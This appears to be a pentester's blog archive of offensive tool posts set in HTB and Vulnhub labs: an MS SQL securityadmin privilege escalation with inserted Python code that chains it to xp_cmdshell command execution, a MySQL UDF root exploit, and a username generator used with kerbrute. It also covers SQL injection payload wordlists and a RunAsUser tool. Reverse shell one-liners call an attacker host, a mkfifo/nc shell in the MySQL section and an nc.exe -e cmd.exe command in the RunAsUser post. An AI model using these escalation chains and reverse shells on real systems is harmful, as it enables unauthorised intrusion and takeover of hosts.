Categories
Tools & Scripts

MS SQL Security Admin – Priv Esc

https://github.com/atthacks/mssql-secadmin-privesc

It’s been a while – I have been crazy busy with work and life in general and unfortunately let the blog slip a little. All the plans I want to do are in the pipeline at some point. It’s just a case of finding the time!!

Anyway, today I give you a custom Metasploit module to add to your arsenal. Within MS SQL Server there is a very easy way to elevate your privileges from the securityadmin fixed server role. By default, securityadmin cannot enable xp_cmdshell (changing a configuration option through sp_configure needs the ALTER SETTINGS permission, which sysadmin and serveradmin hold), so on its own it does not give you code execution on the host. However, securityadmin can create new logins. The login you create cannot be added to a server role higher than securityadmin, which makes sense, but securityadmin is also allowed to GRANT server-level permissions, and nothing stops it granting CONTROL SERVER.

I won’t go into detail on the differences between CONTROL SERVER and sysadmin here; there are plenty of other blogs covering this and similar issues. The short version: CONTROL SERVER is a server-level permission that implies every other server permission, so it is effectively sysadmin (the one practical difference is that a DENY still applies to a CONTROL SERVER login, whereas sysadmin bypasses permission checks entirely). Microsoft’s own documentation says securityadmin should be treated as equivalent to sysadmin for exactly this reason. With CONTROL SERVER you pretty much have the keys to the castle, including the ability to enable xp_cmdshell and get code execution.

I may be wrong, but I haven’t seen an equivalent Metasploit module for this. Anyway, here is a run-down of what the script does:

  • Checks whether the current login is a member of the securityadmin role.
  • If so, a new login is created.
  • CONTROL SERVER is granted to the new login.
  • You then log in manually as the new login and enable xp_cmdshell.

So as you can see it’s straightforward. Installation instructions are on the GitHub page.

If you would like to run these steps manually, these are the steps after logging into SQL Server as the securityadmin login (note that the password has to be a quoted string literal):

select is_srvrolemember('securityadmin') as IsSecAdmin;
-- 1 = member, 0 = not a member, NULL = role or login not found
create login pwned with password = 'Password123!', check_policy = off;
grant control server to pwned;

The grant applies to the new login, not to the session that issued it, so log in again as pwned before enabling xp_cmdshell through sp_configure.

It’s as simple as that.
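The whole chain, including the second session as the new login that the module leaves as a manual step, written out as an added example. This is my own code, not the blog’s Metasploit module or its Ruby; it drives any DB-API 2.0 cursor, so a real run would pass cursors opened with pymssql or pyodbc (assumed, not imported). FakeCursor is a constructed stand-in that records the statements and answers the two queries the flow depends on, so the example runs offline.

```python
"""Added example, not the blog's Metasploit module or its Ruby code: the
securityadmin -> CREATE LOGIN -> GRANT CONTROL SERVER -> xp_cmdshell chain,
driven through any DB-API 2.0 cursor. A real run would pass cursors opened
with pymssql/pyodbc (assumed, not imported here); FakeCursor is a constructed
stand-in that records what would be executed so the flow runs offline."""


def tsql_literal(value):
    """Quote a value as a T-SQL string literal, doubling embedded quotes."""
    return "'" + value.replace("'", "''") + "'"


def tsql_name(name):
    """Bracket-quote an identifier, doubling any ']' inside it."""
    return "[" + name.replace("]", "]]") + "]"


def is_securityadmin(cursor):
    """IS_SRVROLEMEMBER returns 1 (member), 0 (not a member) or NULL when
    the role or login does not exist; only an explicit 1 counts."""
    cursor.execute("SELECT IS_SRVROLEMEMBER('securityadmin') AS IsSecAdmin")
    row = cursor.fetchone()
    return row is not None and row[0] == 1


def privesc_statements(login, password):
    """What the securityadmin session runs: it cannot add anyone to sysadmin,
    but it may GRANT server-level permissions, CONTROL SERVER included."""
    return [
        "CREATE LOGIN %s WITH PASSWORD = %s, CHECK_POLICY = OFF"
        % (tsql_name(login), tsql_literal(password)),
        "GRANT CONTROL SERVER TO %s" % tsql_name(login),
    ]


def escalate(secadmin_cursor, login, password):
    """Step 1, as the securityadmin login. Returns False and runs nothing
    further when the current login is not actually a securityadmin."""
    if not is_securityadmin(secadmin_cursor):
        return False
    for stmt in privesc_statements(login, password):
        secadmin_cursor.execute(stmt)
    return True


def enable_xp_cmdshell_and_run(new_login_cursor, command):
    """Step 2, in a NEW session authenticated as the created login (the grant
    changes nothing for the session that issued it): enable xp_cmdshell via
    sp_configure, run one OS command, return its output lines."""
    for stmt in (
        "EXEC sp_configure 'show advanced options', 1",
        "RECONFIGURE",
        "EXEC sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE",
    ):
        new_login_cursor.execute(stmt)
    new_login_cursor.execute("EXEC xp_cmdshell %s" % tsql_literal(command))
    # xp_cmdshell terminates its result set with a NULL row; drop it
    return [r[0] for r in new_login_cursor.fetchall() if r[0] is not None]


class FakeCursor:
    """Constructed offline stand-in for a DB-API cursor: logs each statement
    and answers only the two queries whose results drive the flow."""

    def __init__(self, securityadmin, cmd_output=("nt service\\mssqlserver",)):
        self.securityadmin = securityadmin
        self.cmd_output = cmd_output
        self.executed = []
        self._rows = []

    def execute(self, sql):
        self.executed.append(sql)
        if sql.startswith("SELECT IS_SRVROLEMEMBER"):
            self._rows = [(1 if self.securityadmin else 0,)]
        elif sql.startswith("EXEC xp_cmdshell"):
            self._rows = [(line,) for line in self.cmd_output] + [(None,)]
        else:
            self._rows = []

    def fetchone(self):
        return self._rows[0] if self._rows else None

    def fetchall(self):
        return list(self._rows)


if __name__ == "__main__":
    as_secadmin = FakeCursor(securityadmin=True)
    if escalate(as_secadmin, "pwned", "Password123!"):
        as_pwned = FakeCursor(securityadmin=False)  # would be a new connection
        print(enable_xp_cmdshell_and_run(as_pwned, "whoami"))
```

The two-cursor split is the point: escalate() only ever runs as the securityadmin login, and enable_xp_cmdshell_and_run() expects a connection authenticated as the login that was just granted CONTROL SERVER. Quoting the password through tsql_literal() also avoids the syntax error in the unquoted manual command and stops a password containing a quote from breaking the statement.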

Anyway, I hope this has helped someone. At some point I may change the script to automatically log in as the new user and then pwn using xp_cmdshell. This is my first go at a custom Metasploit module and I haven’t done a lot of Ruby yet, so it’ll be quite a nice project to continue with when I get the time.

Thanks for reading 🙂


Ugen – Username Generator

What’s this?

Ugen is the latest script I have added to my GitHub repository. It is nothing spectacular: a simple Python script that transforms a list of firstname,lastname pairs into the username formats an organisation might plausibly use (jbloggs, joe.bloggs and so on).

I made this script while working on an HTB Windows machine. The box had a web page listing employees (first names and last names) and I had no way of quickly and efficiently checking which username format they had chosen.

Names should be entered into a text file in the following format:

firstname,lastname
firstname,lastname
firstname,lastname

Then simply run the tool like this:

python -i userInput.txt -o userOutput.txt -n

The “-n” switch is optional and will append the numbers 1-5 to the end of each username possibility. For example, jbloggs1, jbloggs2 etc.
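An added example of the kind of generator described above. It is my own code, not the Ugen script, and the set of formats it tries is my assumption of what such a tool should cover (Ugen’s own list may differ); SAMPLE_INPUT is constructed, and the -n behaviour is modelled by the numbers flag.

```python
"""Added example, not the Ugen script itself: turn 'firstname,lastname' lines
into candidate usernames. The formats tried are my own assumption of what a
generator like this should cover; Ugen's list may differ. SAMPLE_INPUT is a
constructed input file in the layout the post describes."""
import re
import unicodedata

SAMPLE_INPUT = """\
Joe,Bloggs
Mary-Jane, O'Neil
 ,Missing
Émile,Zola
"""


def _norm(part):
    """Fold accents away, keep only a-z0-9, lowercase: a sensible
    normalisation before a name is compared with a sAMAccountName."""
    ascii_part = unicodedata.normalize("NFKD", part).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_part.lower())


def username_formats(first, last):
    """Common corporate formats for one person; empty when a part is missing."""
    f, l = _norm(first), _norm(last)
    if not f or not l:
        return []
    return [
        f + l, f + "." + l, f + "_" + l, f + "-" + l,
        f[0] + l, f[0] + "." + l, f + l[0], f + "." + l[0],
        l + f, l + "." + f, l + f[0], l + "." + f[0],
        f[0] + l[0], f, l,
    ]


def generate(lines, numbers=False, max_suffix=5):
    """Expand every 'firstname,lastname' line. With numbers=True also append
    1..max_suffix to each candidate (jbloggs1 ... jbloggs5), like Ugen's -n.
    Malformed lines are skipped, duplicates dropped, order preserved."""
    seen, out = set(), []
    for line in lines:
        if "," not in line:
            continue
        first, last = (p.strip() for p in line.split(",", 1))
        for base in username_formats(first, last):
            cands = [base]
            if numbers:
                cands += [base + str(n) for n in range(1, max_suffix + 1)]
            for c in cands:
                if c not in seen:
                    seen.add(c)
                    out.append(c)
    return out


def generate_file(in_path, out_path, numbers=False):
    """File-to-file wrapper matching the -i / -o / -n usage above."""
    with open(in_path, encoding="utf-8") as fh:
        names = generate(fh.read().splitlines(), numbers)
    with open(out_path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    for user in generate(SAMPLE_INPUT.splitlines()):
        print(user)
```

Normalising the names first matters more than it looks: a scraped staff page gives you "O'Neil" and "Émile", but the account that actually exists is oneil or emile, and a candidate list that keeps the apostrophe or the accent will never match in Kerberos.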

Typically, you can follow this up with kerbrute to enumerate the usernames in this list and identify which format is correct. kerbrute’s userenum sends a Kerberos AS-REQ for each name; the KDC answers differently for unknown and existing principals, and because no password is ever tried the check does not touch the bad-password count or lock anyone out.

kerbrute userenum --dc 10.10.10.120 -d domain.local ugen_list.txt

I have purposely blurred out the usernames and domain names as I hope to have some Windows challenges coming out soon and do not want to reveal any details about what is valid etc.

Anyway, hope someone finds this useful.

🙂


Privescker

Well I planned to spend the day on HTB – that didn’t happen!

Privescker is a tool I created after experiencing the pain of downloading files to Windows after initially gaining a shell.

I made some changes today as initially I embedded the binaries within privescker.exe. But now I download the zip from the attack machine and extract them all in one go.

There is still lots to do to improve this. I have some really cool ideas on how to take it further, so keep checking back for an update on this one.

I won’t write a long blog for this one as I am shattered and food is almost ready – just check out the GitHub for all the details on how it works https://github.com/atthacks/Privescker

Hope someone finds it helpful. Enjoy 🙂


Couple of Python Scripts

I haven’t had as much time as I would have liked to start on other projects, but I have uploaded two new scripts to my GitHub (https://github.com/atthacks/).

udf_root_py3

https://github.com/atthacks/udf_root_py3

This is a really useful script but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x (https://twitter.com/d7x_real/) did a great job of automating this MySQL privilege escalation (https://www.exploit-db.com/exploits/1518, the raptor_udf2 technique: a shared library is written into MySQL’s plugin directory through SQL and registered with CREATE FUNCTION as a user-defined function, after which sys_exec() runs OS commands in the context of the mysqld process).

There are usually a number of manual steps to complete this privesc (compile the library, get it onto the target, write it out with SELECT ... INTO DUMPFILE, then CREATE FUNCTION). However, if you find yourself in a position where you can use this exploit, simply running this script and passing the MySQL username and password automates the whole process. One caveat: the UDF runs commands as whatever OS user mysqld runs as, so this only gets you root when the service itself runs as root (and the plugin directory has to be writable by it).

python3 udf_root_py3.py --username root --password rootPassword

You may or may not have success with the root shell it attempts to open for you. In my experience I had to exit the shell it entered me in and return to the mysql instance before using the following commands to execute commands as root.

select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 80 >/tmp/f');

urlencode-list

https://github.com/atthacks/urlencode-list

What is this script?

This was a quick Python script I put together to URL encode / decode lists.

Why did I create it?

This has a lot of uses, not just in pentesting / CTF exercises. The reason I made it was that I was in a situation where I could not use a tool such as sqlmap to detect SQL injection, and rather than manually testing everything on my SQL injection cheat sheet I could automate it with a tool like wfuzz.

Where have I used it?

I recommend checking out bootlesshackers Insanity Hosting machine on Vulnhub for an example box of where this may be useful.

Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.

If you have the Community version of Burp, using Intruder like this can take a long time, especially with a large list, because Intruder is rate-limited in Community. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your wordlist.

Notes

Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.

Other ways of doing this?

There are lots of ways / scripts to do this, and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire input as one blob, newlines included, which doesn’t help when you need one encoded payload per line as a wordlist for the attack mentioned above.
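An added example of the per-line behaviour described above. This is my own code, not the urlencode-list script; SAMPLE_PAYLOADS is a constructed wordlist, and the full flag (percent-encode every byte) is my addition rather than anything the script is stated to have.

```python
"""Added example, not the urlencode-list script: encode or decode a payload
wordlist one line at a time, so every input line maps to exactly one output
line (what wfuzz and Burp Intruder expect). SAMPLE_PAYLOADS is constructed."""
from urllib.parse import quote, unquote

SAMPLE_PAYLOADS = [
    "' OR '1'='1",
    "1; WAITFOR DELAY '0:0:5'--",
    "admin'/**/AND/**/1=1#",
    "%27",  # already-encoded input gets double-encoded on purpose
]


def encode_line(line, full=False):
    """Percent-encode one payload. full=True encodes every byte (handy when
    a filter mangles plain letters, or for double-encoding tricks); otherwise
    only characters outside the unreserved set are touched."""
    if full:
        return "".join("%%%02X" % b for b in line.encode("utf-8"))
    return quote(line, safe="")  # safe="" so '/' is encoded as well


def decode_line(line):
    """Decode one payload but keep CR/LF encoded: a decoded newline would
    split the payload across two lines of the wordlist."""
    return unquote(line).replace("\r", "%0D").replace("\n", "%0A")


def transform(lines, mode="encode", full=False):
    """Apply encode/decode line by line, preserving count and order."""
    if mode == "encode":
        return [encode_line(line.rstrip("\r\n"), full) for line in lines]
    if mode == "decode":
        return [decode_line(line.rstrip("\r\n")) for line in lines]
    raise ValueError("mode must be 'encode' or 'decode'")


def transform_file(in_path, out_path, mode="encode", full=False):
    """File wrapper: one payload per line in, one per line out."""
    with open(in_path, encoding="utf-8") as fh:
        out = transform(fh.read().splitlines(), mode, full)
    with open(out_path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(out) + "\n")
    return len(out)


if __name__ == "__main__":
    for raw, enc in zip(SAMPLE_PAYLOADS, transform(SAMPLE_PAYLOADS)):
        print(raw, "->", enc)
```

The decode path is where a naive script goes wrong: a payload such as %0A decodes to a literal newline, which then reads as two entries in the wordlist. Keeping CR and LF encoded is what preserves the one-payload-per-line guarantee in both directions.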

Anyway I hope someone finds these scripts useful.

🙂


RunAsUser – Windows CTF Tool

So I have been very busy with work lately among everyday life in these crazy times. Anyway this is just a quick post of a tool I created recently called RunAsUser (https://github.com/atthacks/RunAsUser).

What does it do?

During some CTF exercises I have been in a position where I have a low-privilege shell on a machine and have found credentials for either another user or admin. Unlike Linux, Windows has no simple su equivalent: runas exists, but it only takes the password from an interactive prompt (there is no switch to pass it on the command line), which is no use from a reverse shell that cannot drive that prompt.

This tool allows you to provide the credentials you found and execute a given program, with arguments (optional), as that user.

Are there other ways to do this?

Yes, there are. You can fairly easily accomplish this in PowerShell, but in my experience, on the CTF challenges I have used this tool on, I have usually had limited or no PowerShell access for one reason or another. In a cmd shell you can run applications as another user, but again I have experienced issues with this in the past where it did not work correctly.

On a lot of these machines there may be another way of using the credentials to pivot or escalate, such as with Evil-WinRM. However, if you are out of options, or as an alternative, this tool can help.

Where have you used it?

Most recently I have used it on HTB boxes JSON and ChatterBox.

On the JSON box, once you have a user shell you can obtain the “superadmin” credentials by decompiling a binary. The credentials are superadmin:funnyhtb. Now although there are other ways to root this particular machine, one avenue you can do it is via RunAsUser.

In the JSON instance I uploaded the RunAsUser.exe binary and then executed the following command.

runasuser.exe -u superadmin -p funnyhtb -f c:\Users\Public\nc.exe -a '10.10.14.12 9001 -e cmd.exe'

The above command worked a treat and I got my reverse shell back as superadmin.

The ChatterBox machine demonstrates another way you can use RunAsUser.

(Screenshot: winPEAS output showing the credentials it found for Alfred)

As we can see from the winPEAS output, it found credentials for Alfred. Some guides online port-forward SMB and then use winexe to connect; others use PowerShell and go through creating a credential object and passing it to Start-Process to run a command as that user. This is how I did it:

(Screenshot: RunAsUser prompting for each argument interactively)

RunAsUser supports command-line arguments (shown in the JSON example); if none are supplied it walks through each step with you, letting you enter them one at a time as seen in the picture above.

How does the tool work?

It’s a very simple C# application that takes the arguments you supply and creates a process using them. The tool does the job, and in the near future I will likely update it and tidy it up a bit.

This isn’t an every day tool but has certainly made my life easier on quite a few boxes now which is why I made it to be honest.

Anyway I hope this can help someone else. I have more tools and scripts I’ll be releasing soon.

Stay safe everyone 🙂

***Edit***

I have updated the GitHub page (https://github.com/atthacks/RunAsUser) to show an example of where “runas” does not work and “RunAsUser” does. I created this tool for this exact reason: I was on a machine and had credentials, and my initial thought was runas; however, it would not work and kept skipping over the password prompt. I am aware there are other solutions that do the same thing, but I enjoyed making this quick tool and thought I would share it, as it will hopefully be helpful to someone.